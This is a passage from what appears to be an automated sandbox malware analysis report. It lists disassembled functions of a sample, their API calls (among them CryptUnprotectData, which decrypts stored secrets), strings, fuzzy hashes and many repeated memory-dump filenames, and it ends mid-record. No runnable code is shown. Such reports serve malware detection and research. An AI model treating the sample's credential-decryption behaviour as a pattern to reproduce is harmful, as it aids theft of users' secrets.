                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: 92423b93235df26a7b9b43b0a8cf3d59351307c9012e4e16769e7d24e7e3e686
                          • Instruction ID: 0f50b91d1edcf6814f9a5517eeccd6c4a7bd89eab0b30b466fdec0b5f936c22f
                          • Opcode Fuzzy Hash: 92423b93235df26a7b9b43b0a8cf3d59351307c9012e4e16769e7d24e7e3e686
                          • Instruction Fuzzy Hash: C411A5B1909218DFDB209B54DC49FA9B778FB44761F1003E9FA19972D0D7741940CF51
                          Function 00033970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(0003E120,00000000,00000001,0003E110,00000000), ref: 000339A8
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00033A00
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: 83b868da8b0c1a15cc00d52b279339a6de7468e3638883fbab5bdc44b174a38a
                          • Instruction ID: 24c0acfed0bd2499bef1d561686bb493afc67826cc0278e1ded8ae67a6be1dad
                          • Opcode Fuzzy Hash: 83b868da8b0c1a15cc00d52b279339a6de7468e3638883fbab5bdc44b174a38a
                          • Instruction Fuzzy Hash: 2741D870A40A189FDB24DB54CC95B9BB7B9AB48702F4041D8E608EB2D0D7B16E85CF50
                          Function 0002A2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0002A2D4
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 0002A2F3
                          • LocalFree.KERNEL32(?), ref: 0002A323
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: f3f1f757d3d5fbf33c3bcdb79d3eccf96ccc471e2e86cb0410ebeb7ab5ccbc5a
                          • Instruction ID: af3e97e78f4ede0e84d3b848d9a2da4ca67356aa1a1186dd7a6e7b69f622f9f4
                          • Opcode Fuzzy Hash: f3f1f757d3d5fbf33c3bcdb79d3eccf96ccc471e2e86cb0410ebeb7ab5ccbc5a
                          • Instruction Fuzzy Hash: 5211A8B4A00209EFDB04DFA8D989AAEB7B5FB89700F108569FD1597350D770AE50CB61
                          Function 00471D9B Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ,J?}$X00@$Z@A~
                          • API String ID: 0-4052591620
                          • Opcode ID: 1540693aa4e36611779b9905dd54f94c5a1f8c3e35b21a23013df82d769e344a
                          • Instruction ID: 03cfe34964edbd32754922f845e4d92c8820f71b4fd71b1a20fa04c793bac9c3
                          • Opcode Fuzzy Hash: 1540693aa4e36611779b9905dd54f94c5a1f8c3e35b21a23013df82d769e344a
                          • Instruction Fuzzy Hash: 4AD1F3F360C2049FD3146E2DEC8567ABBE9EF98320F16492DEAC5C3740EA3599058657
                          Function 00476118 Relevance: 4.1, Strings: 2, Instructions: 1622COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: `_>$pz
                          • API String ID: 0-3739609173
                          • Opcode ID: 21108d98efe145f85e86977a6d4fa969f7ce96b3c9a8c86c047cef3912ac654f
                          • Instruction ID: 2038e07cba05432ad7a021c961a4a176eb8dca954eeb30161bffcaf5e1ea6a7d
                          • Opcode Fuzzy Hash: 21108d98efe145f85e86977a6d4fa969f7ce96b3c9a8c86c047cef3912ac654f
                          • Instruction Fuzzy Hash: DEB2F3F3A0C2049FE7046E2DEC8566AFBE9EB94720F1A493DE6C4C3744EA3558058797
                          Function 00479DB9 Relevance: 3.7, Strings: 2, Instructions: 1150COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: qZ}$7~
                          • API String ID: 0-3309181307
                          • Opcode ID: 4ee6bcd5d53a3e9cf75d23c7d2b199c6091b53f52c9d59460d738a325e68eda8
                          • Instruction ID: 9f253ec1324d9b6132694918c58d8f1d9e9cf9710e7dc22e7fe3877db37f1beb
                          • Opcode Fuzzy Hash: 4ee6bcd5d53a3e9cf75d23c7d2b199c6091b53f52c9d59460d738a325e68eda8
                          • Instruction Fuzzy Hash: 517229F3A082009FE3046E2DEC8567AFBE9EFD4760F1A493DE6C5C7344EA7558058692
                          Function 00094BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ?$__ZN
                          • API String ID: 0-1427190319
                          • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                          • Instruction ID: 5d84ab5d1712ba47253f808e0fbaae2fef371384a53bdc5e7662cd77cdcd1a5d
                          • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                          • Instruction Fuzzy Hash: DA722472908B109BDB25CF25CC90A6EB7E2FFC5311F598A1DF8A55B291D370DC41AB81
                          Function 00075DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: xn--
                          • API String ID: 0-2826155999
                          • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                          • Instruction ID: dbbb81b4f15ec7f0e7085b36b2ea566d90d5256bd5df78c05145d6964eeff972
                          • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                          • Instruction Fuzzy Hash: 2CA213B1D00A688AEF28CB58C8507EDB7F1EF45300F1882AAD45F77281D77A5E85CB59
                          Function 00074DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv
                          • String ID:
                          • API String ID: 3732870572-0
                          • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                          • Instruction ID: a05aa3b9c2cf29b640e60a79c3d74d4b78f5a26aeb34130107f1f2a5d02d49c1
                          • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                          • Instruction Fuzzy Hash: 41E1E131A083419FC725CF28C8817AEB7E2EFC9300F55892DE5DD9B291D775A845CB8A
                          Function 00074868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv
                          • String ID:
                          • API String ID: 3732870572-0
                          • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                          • Instruction ID: 1686856e645bdfebdcf1e43ef0f64dd91bc81876a07172cf28d7e3317735c664
                          • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                          • Instruction Fuzzy Hash: 03E1A031A083059FCB24CE18C8917AEB7E6EFC5310F15C92DE99D9B251DB34AC45CB4A
                          Function 0008E258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: UNC\
                          • API String ID: 0-505053535
                          • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                          • Instruction ID: 24d256217f9d25b7af1bb5d0f8f26ee9c4186cd23c2efced848036c46b6731b7
                          • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                          • Instruction Fuzzy Hash: BDE14E71D046E58FEB20DF18C8843BEBFE2BB95314F198169D4E85B292D7358D45CB90
                          Function 003B7A29 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: fTm_
                          • API String ID: 0-2134616096
                          • Opcode ID: 0df23f7230ae1231af3d5e667d2aad23a846f0939a05fbde3d97b4e4f87c641d
                          • Instruction ID: 6ddd3bfdf8df8e4aca71cf31004bb3f884087af35fc14d0fb406509e051d3a39
                          • Opcode Fuzzy Hash: 0df23f7230ae1231af3d5e667d2aad23a846f0939a05fbde3d97b4e4f87c641d
                          • Instruction Fuzzy Hash: 2A5129F3D082149BE3146A18DC417AAB7E5EF94760F1B463CDAD893780E6395C1087D3
                          Function 0044E8A7 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
